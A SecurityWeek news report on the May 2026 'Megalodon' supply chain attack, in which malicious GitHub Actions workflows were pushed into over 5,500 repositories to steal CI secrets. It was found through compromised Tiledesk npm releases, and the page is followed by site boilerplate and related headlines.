Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack

Summary

The Megalodon supply chain attack compromised over 5,500 GitHub repositories through 5,700+ malicious commits injected in a six-hour window on May 18, 2026. The attackers deployed GitHub Actions workflows containing payloads designed to exfiltrate CI environment variables, cloud credentials, SSH keys, API tokens, and other sensitive secrets from infected machines. The campaign was discovered after malicious versions of the Tiledesk open-source package were published; the attacker compromised the source repository and the maintainer unknowingly published the poisoned code.

Full text

More than 5,500 GitHub repositories were infected with malware in a supply chain attack that relies on automated commits, security researchers warn. The campaign, dubbed Megalodon, relies on GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets. The workflows, SafeDep says, were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window, on May 18. According to the cybersecurity firm, the attackers deployed two payloads as part of the attack. One was designed to add a new workflow that would be triggered on every push and pull request, and another that replaced existing workflows with specific triggers, creating dormant backdoors. On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other types of secrets. Megalodon, SafeDep explains, was discovered after malicious versions of the Tiledesk package, an open source live chat and chatbot platform, were identified. The infected packages were published between May 19 and May 21.Advertisement. Scroll to continue reading. “The same NPM account, eljohnny ([email protected]), published both the clean 2.18.5 and the compromised versions. The attacker never touched the NPM account. They compromised the GitHub repository, and the maintainer published from the poisoned source without realizing it,” SafeDep says. The malicious commit that led to the infection was pushed on May 18, authored by ‘build-bot’. SafeDep’s investigation into the associated email address uncovered a total of 2,878 commits made on the same day, along with an additional 2,841 commits made via a second email address. “All 5,718 commits landed on the same day: May 18, 2026, across a six-hour window from approximately 11:36 to 17:48 UTC, targeting 5,561 distinct repositories,” SafeDep explains. The cybersecurity firm also notes that the attackers’ choice of malicious GitHub Actions workflow, namely ‘workflow_dispatch’, ensured that the dormant backdoor could be triggered at a later date via the GitHub API, using stolen GitHub tokens. The workflow is exempted from GitHub’s anti-recursion rules, which prevent new workflow runs from being spawned via GitHub token-triggered events. Last week, NPM announced that all NPM granular access tokens with write access that bypass two-factor authentication have been invalidated to prevent supply chain attacks similar to Mini Shai-Hulud. According to Ox Security, this should prevent account hijacking, but does not resolve the underlying problem, and malicious code will continue to spread through compromised repositories. “If platforms continue allowing any type of code to be uploaded without serious vetting, the number of attacks will only increase,” Ox notes. “We’ve entered a new supply chain attack era, and TeamPCP compromising GitHub was only the beginning. What’s coming next is an endless wave, a tsunami of cyber attacks on developers worldwide,” the cybersecurity firm says. Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack Related: Supply Chain Security Crisis: Too Many Vulnerabilities, Too Little Visibility Related: Over 320 NPM Packages Hit by Fresh Mini Shai-Hulud Supply Chain Attack Related: OpenAI Hit by TanStack Supply Chain Attack Written By Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. Daily Briefing Newsletter Subscribe to the SecurityWeek Email Briefing for the latest cybersecurity threats, trends, and expert insights. More from Ionut Arghire Apple Rejected 2 Million App Store Submissions in 2025 for Security and Fraud PreventionSocket Raises $60 Million at $1 Billion ValuationMicrosoft Patches Exploited UnDefend and RedSun Defender Zero-DaysMicrosoft Rolls Out Mitigations for ‘YellowKey’ BitLocker BypassOver 320 NPM Packages Hit by Fresh Mini Shai-Hulud Supply Chain AttackGitHub Confirms Hack Impacting 3,800 Internal RepositoriesVerizon DBIR 2026: Vulnerability Exploitation Overtakes Credential Theft as Top Breach VectorUnpatched ChromaDB Vulnerability Can Lead to Server Takeover Latest News ‘Underminr’ Vulnerability Lets Attackers Hide Malicious Connections Behind Trusted DomainsDrupal Vulnerability in Hacker Crosshairs Shortly After DisclosureIn Other News: Industrial Router Exploitation, CISA KEV Nomination Form, Gas Station HackingCanadian Man Arrested for Operating Kimwolf Botnet‘First VPN’ Cybercrime Service Disrupted, Administrator ArrestedTrendAI Patches Apex One Zero-Day Exploited in the WildGrafana Says Codebase and Other Data Stolen via TanStack Supply Chain AttackCisco Patches Critical Vulnerability in Secure Workload Trending Daily Briefing NewsletterSubscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts. Virtual Event: Threat Detection and Incident Response Summit May 20, 2026 Delve into big-picture strategies to reduce attack surfaces, improve patch management, conduct post-incident forensics, and tools and tricks needed in a modern organization. Register Webinar: Third-Party Risk in Practice June 4, 2026 Organizations are investing heavily in third-party risk management, but breaches, delays, and blind spots continue to persist. Join this live webinar as we examine the gap between how organizations think their third-party risk programs are performing and what’s actually happening in practice. Register People on the MoveJoe Chen has become Chief Technology Officer at Trellix.Usercentrics has named Pawan Hegde as COO and Elena Ignatova as CPTO.SecureAuth has named Mark van Oppen as Chief Revenue Officer.More People On The MoveExpert Insights Caught Off Guard: Securing AI After It Hits Production As enterprises rush AI projects into production, security teams are increasingly being forced into reactive mode. (Joshua Goldfarb) Cyber Resilience is the New Business Continuity Plan The organizations best prepared to face disruption are those that align security, continuity and risk management around what the business cannot afford to lose. (Steve Durbin) Enhancing Data Center Security Without Sacrificing Performance For AI data centers, where the stakes are the highest and performance constraints are the tightest, security and performance are no longer a zero-sum game. (Nadir Izrael) Is the SOC Obsolete, and We Just Haven’t Admitted It Yet? Many AI-first enterprises have already embraced sovereign architectures for general AI initiatives; cybersecurity—and the SOC—should be next. (Danelle Au) The Mythos Moment: Enterprises Must Fight Agents with Agents Only with the right platform and an agentic, AI-driven defense, will enterprises be able to protect themselves in the agentic era. (Etay Maor) Flipboard Reddit Whatsapp Whatsapp Email

Indicators of Compromise

• malware — Megalodon

Entities